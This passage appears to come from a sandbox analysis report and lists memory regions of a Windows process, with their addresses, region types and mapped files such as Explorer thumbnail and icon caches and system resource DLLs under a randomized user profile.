0x22bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022b0000" filename = "" Region: id = 766 start_va = 0x22c0000 end_va = 0x25f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 767 start_va = 0x2600000 end_va = 0x267ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 768 start_va = 0x2680000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 769 start_va = 0x2700000 end_va = 0x2701fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002700000" filename = "" Region: id = 770 start_va = 0x2720000 end_va = 0x2721fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002720000" filename = "" Region: id = 771 start_va = 0x2730000 end_va = 0x2731fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002730000" filename = "" Region: id = 772 start_va = 0x2740000 end_va = 0x2743fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 773 start_va = 0x2750000 end_va = 0x2753fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 774 start_va = 0x2770000 end_va = 0x2773fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 775 start_va = 0x2780000 end_va = 0x285ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 776 start_va = 0x2860000 end_va = 0x295ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 777 start_va = 0x2960000 end_va = 0x29dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002960000" filename = "" Region: id = 778 start_va = 0x29e0000 end_va = 0x2a9bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029e0000" filename = "" Region: id = 779 start_va = 0x2aa0000 end_va = 0x2b9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002aa0000" filename = "" Region: id = 780 start_va = 0x2ba0000 end_va = 0x3bdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 781 start_va = 0x3be0000 end_va = 0x3be0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003be0000" filename = "" Region: id = 782 start_va = 0x3bf0000 end_va = 0x3bf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003bf0000" filename = "" Region: id = 783 start_va = 0x3c00000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 784 start_va = 0x3c80000 end_va = 0x3c81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c80000" filename = "" Region: id = 785 start_va = 0x3c90000 end_va = 0x3c90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c90000" filename = "" Region: id = 786 start_va = 0x3ca0000 end_va = 0x3ca0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ca0000" filename = "" Region: id = 787 start_va = 0x3cb0000 end_va = 0x3cb3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 788 start_va = 0x3cc0000 end_va = 0x3dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cc0000" filename = "" Region: id = 789 start_va = 0x3dc0000 end_va = 0x3dc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003dc0000" filename = "" Region: id = 790 start_va = 0x3dd0000 end_va = 0x3ddffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003dd0000" filename = "" Region: id = 791 start_va = 0x3de0000 end_va = 0x3deffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003de0000" filename = "" Region: id = 792 start_va = 0x3df0000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003df0000" filename = "" Region: id = 793 start_va = 0x3e00000 end_va = 0x3e00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 794 start_va = 0x3e10000 end_va = 0x3e10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e10000" filename = "" Region: id = 795 start_va = 0x3e20000 end_va = 0x3e20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e20000" filename = "" Region: id = 796 start_va = 0x3e30000 end_va = 0x3e33fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 797 start_va = 0x3e40000 end_va = 0x3e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e40000" filename = "" Region: id = 798 start_va = 0x3e50000 end_va = 0x3e50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e50000" filename = "" Region: id = 799 start_va = 0x3e60000 end_va = 0x3e60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 800 start_va = 0x3e70000 end_va = 0x3e71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e70000" filename = "" Region: id = 801 start_va = 0x3e80000 end_va = 0x3eb8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e80000" filename = "" Region: id = 802 start_va = 0x3ec0000 end_va = 0x3ec0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ec0000" filename = "" Region: id = 803 start_va = 0x3ed0000 end_va = 0x3ed0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 804 start_va = 0x3ee0000 end_va = 0x3ee4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 805 start_va = 0x3ef0000 end_va = 0x3ef1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 806 start_va = 0x3f00000 end_va = 0x3f00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f00000" filename = "" Region: id = 807 start_va = 0x3f10000 end_va = 0x3f10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f10000" filename = "" Region: id = 808 start_va = 0x3f20000 end_va = 0x3f20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f20000" filename = "" Region: id = 809 start_va = 0x3f30000 end_va = 0x3f30fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Region: id = 810 start_va = 0x3f40000 end_va = 0x3f4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f40000" filename = "" Region: id = 811 start_va = 0x3f50000 end_va = 0x3fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f50000" filename = "" Region: id = 812 start_va = 0x3fd0000 end_va = 0x3fd1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003fd0000" filename = "" Region: id = 813 start_va = 0x3fe0000 end_va = 0x3fe3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 814 start_va = 0x3ff0000 end_va = 0x4034fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 815 start_va = 0x4040000 end_va = 0x4043fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 816 start_va = 0x4050000 end_va = 0x40ddfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 817 start_va = 0x40e0000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 818 start_va = 0x4160000 end_va = 0x4160fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004160000" filename = "" Region: id = 819 start_va = 0x4170000 end_va = 0x41b8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004170000" filename = "" Region: id = 820 start_va = 0x41c0000 end_va = 0x41c8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041c0000" filename = "" Region: id = 821 start_va = 0x41d0000 end_va = 0x41d8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 822 start_va = 0x41e0000 end_va = 0x425ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 823 start_va = 0x4260000 end_va = 0x42dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004260000" filename = "" Region: id = 824 start_va = 0x42e0000 end_va = 0x435ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042e0000" filename = "" Region: id = 825 start_va = 0x4360000 end_va = 0x4b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004360000" filename = "" Region: id = 826 start_va = 0x4b60000 end_va = 0x4bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b60000" filename = "" Region: id = 827 start_va = 0x4be0000 end_va = 0x4c5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004be0000" filename = "" Region: id = 828 start_va = 0x4c60000 end_va = 0x4cdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c60000" filename = "" Region: id = 829 start_va = 0x4ce0000 end_va = 0x4ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ce0000" filename = "" Region: id = 830 start_va = 0x4de0000 end_va = 0x7161fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "appdb.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Notifications\\appdb.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\notifications\\appdb.dat") Region: id = 831 start_va = 0x7170000 end_va = 0x7171fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 832 start_va = 0x7180000 end_va = 0x7180fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 833 start_va = 0x7190000 end_va = 0x7196fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007190000" filename = "" Region: id = 834 start_va = 0x71a0000 end_va = 0x71a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000071a0000" filename = "" Region: id = 835 start_va = 0x71b0000 end_va = 0x71b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000071b0000" filename = "" Region: id = 836 start_va = 0x71c0000 end_va = 0x71c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000071c0000" filename = "" Region: id = 837 start_va = 0x71d0000 end_va = 0x71d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000071d0000" filename = "" Region: id = 838 start_va = 0x71e0000 end_va = 0x71effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 839 start_va = 0x71f0000 end_va = 0x730cfff monitored = 0 entry_point = 0x71f1cc0 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 840 start_va = 0x7340000 end_va = 0x7359fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000001a.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000001a.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000001a.db") Region: id = 841 start_va = 0x7360000 end_va = 0x7363fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 842 start_va = 0x7370000 end_va = 0x7373fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 843 start_va = 0x7380000 end_va = 0x7394fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007380000" filename = "" Region: id = 844 start_va = 0x73a0000 end_va = 0x73a0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_256.db") Region: id = 845 start_va = 0x73b0000 end_va = 0x73f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000073b0000" filename = "" Region: id = 846 start_va = 0x7400000 end_va = 0x7401fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 847 start_va = 0x7410000 end_va = 0x7411fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 848 start_va = 0x7460000 end_va = 0x7461fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007460000" filename = "" Region: id = 849 start_va = 0x74b0000 end_va = 0x74b0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{e23b5da4-e3a9-461b-8050-8e471867b572}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{E23B5DA4-E3A9-461B-8050-8E471867B572}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{e23b5da4-e3a9-461b-8050-8e471867b572}.2.ver0x0000000000000001.db") Region: id = 850 start_va = 0x74c0000 end_va = 0x74c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 851 start_va = 0x74d0000 end_va = 0x74d0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{5c9e180f-34bb-4f92-8676-68c88e410c2b}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{5C9E180F-34BB-4F92-8676-68C88E410C2B}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{5c9e180f-34bb-4f92-8676-68c88e410c2b}.2.ver0x0000000000000001.db") Region: id = 852 start_va = 0x74e0000 end_va = 0x74e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 853 start_va = 0x74f0000 end_va = 0x79e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000074f0000" filename = "" Region: id = 854 start_va = 0x79f0000 end_va = 0x79f2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000079f0000" filename = "" Region: id = 855 start_va = 0x7a00000 end_va = 0x7afffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 856 start_va = 0x7b00000 end_va = 0x7b00fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{0fa68fff-8d1f-4fcc-b2fc-0c8384cf8d69}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{0FA68FFF-8D1F-4FCC-B2FC-0C8384CF8D69}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{0fa68fff-8d1f-4fcc-b2fc-0c8384cf8d69}.2.ver0x0000000000000001.db") Region: id = 857 start_va = 0x7b10000 end_va = 0x7b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b10000" filename = "" Region: id = 858 start_va = 0x7b20000 end_va = 0x7b27fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.storage.dll.mui" filename = "\\Windows\\System32\\en-US\\windows.storage.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\windows.storage.dll.mui") Region: id = 859 start_va = 0x7b30000 end_va = 0x7b31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007b30000" filename = "" Region: id = 860 start_va = 0x7b40000 end_va = 0x7b40fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 861 start_va = 0x7b50000 end_va = 0x7b53fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 862 start_va = 0x7b60000 end_va = 0x7b60fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3ec13d2a-c75f-4a0a-9855-0b415d40999c}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{3EC13D2A-C75F-4A0A-9855-0B415D40999C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{3ec13d2a-c75f-4a0a-9855-0b415d40999c}.2.ver0x0000000000000001.db") Region: id = 863 start_va = 0x7b90000 end_va = 0x7b90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007b90000" filename = "" Region: id = 864 start_va = 0x7ba0000 end_va = 0x7c0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007ba0000" filename = "" Region: id = 865 start_va = 0x7c20000 end_va = 0x7d1ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 866 start_va = 0x7d20000 end_va = 0x7e1ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 867 start_va = 0x7e20000 end_va = 0x7f1ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 868 start_va = 0x7f20000 end_va = 0x801ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 869 start_va = 0x8040000 end_va = 0x8041fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008040000" filename = "" Region: id = 870 start_va = 0x8050000 end_va = 0x814ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 871 start_va = 0x8170000 end_va = 0x81effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008170000" filename = "" Region: id = 872 start_va = 0x81f0000 end_va = 0x82effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 873 start_va = 0x8370000 end_va = 0x83effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008370000" filename = "" Region: id = 874 start_va = 0x8400000 end_va = 0x847ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008400000" filename = "" Region: id = 875 start_va = 0x8480000 end_va = 0x867ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008480000" filename = "" Region: id = 876 start_va = 0x8680000 end_va = 0x86fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008680000" filename = "" Region: id = 877 start_va = 0x8700000 end_va = 0x8701fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008700000" filename = "" Region: id = 878 start_va = 0x8710000 end_va = 0x8711fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008710000" filename = "" Region: id = 879 start_va = 0x8790000 end_va = 0x8791fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008790000" filename = "" Region: id = 880 start_va = 0x87a0000 end_va = 0x87a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000087a0000" filename = "" Region: id = 881 start_va = 0x87b0000 end_va = 0x87b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000087b0000" filename = "" Region: id = 882 start_va = 0x87c0000 end_va = 0x883ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087c0000" filename = "" Region: id = 883 start_va = 0x8840000 end_va = 0x893ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 884 start_va = 0x89c0000 end_va = 0x8a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000089c0000" filename = "" Region: id = 885 start_va = 0x8a40000 end_va = 0x8a43fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 886 start_va = 0x8a80000 end_va = 0x8a80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008a80000" filename = "" Region: id = 887 start_va = 0x8a90000 end_va = 0x8b8ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 888 start_va = 0x8b90000 end_va = 0x8c8ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 889 start_va = 0x8c90000 end_va = 0x8d8ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 890 start_va = 0x8d90000 end_va = 0x8eaafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008d90000" filename = "" Region: id = 891 start_va = 0x9020000 end_va = 0x909ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009020000" filename = "" Region: id = 892 start_va = 0x90a0000 end_va = 0x911ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090a0000" filename = "" Region: id = 893 start_va = 0x9320000 end_va = 0x9321fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009320000" filename = "" Region: id = 894 start_va = 0x9330000 end_va = 0x9330fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009330000" filename = "" Region: id = 895 start_va = 0x9340000 end_va = 0x9341fff monitored = 1 entry_point 